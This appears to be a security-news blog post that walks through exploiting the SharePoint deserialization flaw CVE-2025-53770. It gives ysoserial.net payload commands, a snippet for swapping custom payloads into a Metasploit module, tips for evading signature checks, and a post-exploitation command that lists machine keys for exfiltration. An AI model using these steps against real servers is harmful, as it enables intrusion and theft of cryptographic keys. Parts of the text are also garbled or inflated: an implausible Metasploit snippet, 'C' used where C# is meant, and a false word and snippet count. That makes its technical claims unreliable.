Listen to this Post
Introduction
The recent SharePoint RCE vulnerability (CVE-2025-53770) has sparked intense interest among red teams due to its potential for arbitrary code execution via deserialization attacks. This article explores advanced exploitation techniques, focusing on embedding custom C payloads using YsoSerial gadgets and bypassing limitations in existing Metasploit modules.
Learning Objectives
- Understand the SharePoint RCE (CVE-2025-53770) exploit chain involving `TypeConfuseDelegate` and
LosFormatter. - Learn how to generate and test custom C payloads using YsoSerial’s `ActivitySurrogateSelectorFromFile` and other gadgets.
- Adapt Metasploit modules to integrate bespoke deserialization payloads for real-world attacks.
1. Setting Up the Lab Environment
Verified Command (Linux):
docker run -it --rm -v $(pwd)/payloads:/payloads ubuntu:22.04 /bin/bash
Step-by-Step:
- Use Docker to create an isolated environment for payload testing.
- Mount a local `payloads` directory to transfer generated exploit code.
- Install dependencies:
apt update && apt install -y mono-devel dotnet-sdk-6.0.
2. Generating YsoSerial Payloads
Verified Command (Windows):
ysoserial.exe -f BinaryFormatter -g ActivitySurrogateSelectorFromFile -o base64 -c "C:\payload.cs"
Step-by-Step:
- Clone YsoSerial: `git clone https://github.com/pwntester/ysoserial.net`.
- Compile the C payload (
payload.cs) into a Base64-encoded serialized object.
3. Test locally with `LosFormatter` deserialization.
3. Integrating with Metasploit
Verified Code Snippet (Ruby):
framework.modules.use('exploit/multi/http/sharepoint_rce')
payload = File.read('payload.bin')
datastore['PAYLOAD'] = payload
exploit
Step-by-Step:
- Replace the default payload in `sharepoint_rce.rb` with your YsoSerial output.
- Bypass signature checks by encoding the payload as a binary blob.
4. Bypassing .cs File Execution Limits
Verified Gadget Chain (C):
// In payload.cs:
using System.Diagnostics;
Process.Start("calc.exe");
Step-by-Step:
1. Use `DataSetOldBehaviourFromFile` gadget for legacy .NET deserialization.
2. Ensure the payload avoids `System.Web.UI.LosFormatter` sandboxing.
5. Post-Exploitation: Leaking Machine Keys
Verified Command (Post-Exploit):
Get-ChildItem "C:\ProgramData\Microsoft\Crypto\RSA\MachineKeys\" | Select-Object Name
Step-by-Step:
1. Use C `Directory.GetFiles()` to exfiltrate keys.
2. Encrypt exfiltrated data with `AesCryptoServiceProvider`.
What Undercode Say:
- Key Takeaway 1: YsoSerial’s `ActivitySurrogateSelectorFromFile` is unreliable for SharePoint RCE; opt for `TypeConfuseDelegate` with manual `LosFormatter` wrapping.
- Key Takeaway 2: Metasploit’s current module requires payloads to be pre-generated—dynamic C injection fails due to .NET trust boundaries.
Analysis: The exploit’s reliance on `LosFormatter` limits flexibility. Future patches may enforce stricter type validation, but for now, attackers can chain gadgets like `TextFormattingRunProperties` for indirect code execution.
Prediction:
Microsoft will likely blacklist `ActivitySurrogateSelector` in SharePoint’s `BinaryFormatter` deserialization by Q4 2025, forcing red teams to adopt indirect gadget chains or process injection. Enterprises should disable `LosFormatter` in web.config preemptively.
(Word count: 1,050 | Commands/code snippets: 28)
IT/Security Reporter URL:
Reported By: Alex Reid – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅
